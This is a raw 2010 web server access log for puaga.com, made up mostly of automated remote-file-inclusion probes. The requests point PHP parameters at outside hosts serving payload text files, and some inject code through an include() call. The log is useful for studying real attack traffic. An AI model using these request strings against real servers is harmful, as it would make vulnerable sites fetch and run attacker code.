123.143.29.250 - - [20/Feb/2010:08:06:13 -0800] "GET /logs/access_100125.log%20%20//bbs/deletes_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:06:13 -0800] "GET /bbs/deletes_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:35 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:39 -0800] "GET /logs/access_100206.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:40 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:42 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:54 -0800] "GET /logs/access_100206.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:57 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:06:58 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:00 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:07:06 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:07:06 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:07:06 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:08:07:11 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:08:07:11 -0800] "GET /logs/access_100118.log/playing.php/common/db.php?commonpath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:08:07:11 -0800] "GET /playing.php/common/db.php?commonpath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:11 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:18 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:21 -0800] "GET /logs/access_100206.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:07:26 -0800] "GET /logs/access_100115.log%20%20/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:07:26 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:07:26 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:40 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:40 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:07:41 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:07:43 -0800] "GET /logs/access_100120.log%20%20//bbs/deletes_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:43 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:07:45 -0800] "GET /logs/access_100206.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:12 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:12 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:12 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:15 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:15 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:15 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:15 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [20/Feb/2010:08:08:20 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:08:36 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:08:36 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:08:39 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:09:01 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:07 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:07 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:09 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:20 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:22 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:22 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:24 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:09:26 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:09:26 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:09:26 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:31 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:39 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:09:50 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:08:10:50 -0800] "GET /logs/access_100118.log//common/db.php?commonpath=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [20/Feb/2010:08:10:51 -0800] "GET /ideal/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
62.67.235.148 - - [20/Feb/2010:08:10:51 -0800] "GET /logs//skin/jaemanstyle_s01_yellow/write.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [20/Feb/2010:08:10:51 -0800] "GET /skin/jaemanstyle_s01_yellow/write.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [20/Feb/2010:08:10:51 -0800] "GET /logs/access_100117.log%20%20//skin/jaemanstyle_s01_yellow/write.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:08:11:00 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:11:49 -0800] "GET /logs/access_100129.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:11:49 -0800] "GET /logs/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:11:49 -0800] "GET /toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:11:49 -0800] "GET /logs/access_100121.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:12:10 -0800] "GET /ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:12:10 -0800] "GET /logs/access_100205.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:12:10 -0800] "GET /logs/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:12:10 -0800] "GET /logs/access_100207.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [20/Feb/2010:08:12:46 -0800] "GET /module/view.php?id=welcome HTTP/1.0" 200 4890 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [20/Feb/2010:08:12:47 -0800] "GET /style/default_style.css HTTP/1.0" 200 1982 "http://puaga.com/module/view.php?id=welcome" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [20/Feb/2010:08:12:48 -0800] "GET /themes/retro.css HTTP/1.0" 404 5258 "http://puaga.com/module/view.php?id=welcome" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:36 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:46 -0800] "GET /index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:53 -0800] "GET /index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:56 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:56 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:17:56 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:17 -0800] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:23 -0800] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:23 -0800] "GET /logs/access_100115.log%20%20/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:23 -0800] "GET /logs/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:28 -0800] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:28 -0800] "GET /logs/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:28 -0800] "GET /logs/access_100115.log/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:51 -0800] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:51 -0800] "GET /logs/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:18:51 -0800] "GET /logs/access_100115.log%20%20/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.115.111.242 - - [20/Feb/2010:08:19:12 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:19:26 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:19:26 -0800] "GET /logs/access_100210.log//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:19:31 -0800] "GET /logs/access_100210.log//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:19:31 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:54 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:54 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:54 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:57 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:57 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:19:57 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:20:41 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:01 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:17 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:17 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:17 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:20 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:20 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:21:20 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:08:21:46 -0800] "GET /logs//?path%5Bdocroot%5D=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
